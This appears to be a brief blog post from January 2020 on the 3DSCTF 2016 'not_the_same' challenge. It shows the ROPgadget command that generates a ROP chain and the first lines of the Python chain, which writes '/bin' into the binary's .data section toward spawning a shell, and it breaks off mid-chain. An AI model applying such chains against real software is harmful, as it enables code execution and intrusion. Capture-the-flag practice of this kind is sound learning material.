ROPgadget-not_the_same_3dsctf_2016
ROPgadget --binary not_the_same_3dsctf_2016 --ropchain 自动生成 from struct import pack p = '' p += pack('<I', 0x0806fcca) # pop edx ; ret p += pack('<I', 0x080eb060) # @ .data p += pack('<I', 0x08048b0b) # pop eax ; ret p += '/bin' p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x0806fcca) # pop edx ; ret p += pack('<I', 0x080eb064) # @
Posted by Mr.Be1ieVe on Tuesday, January 14, 2020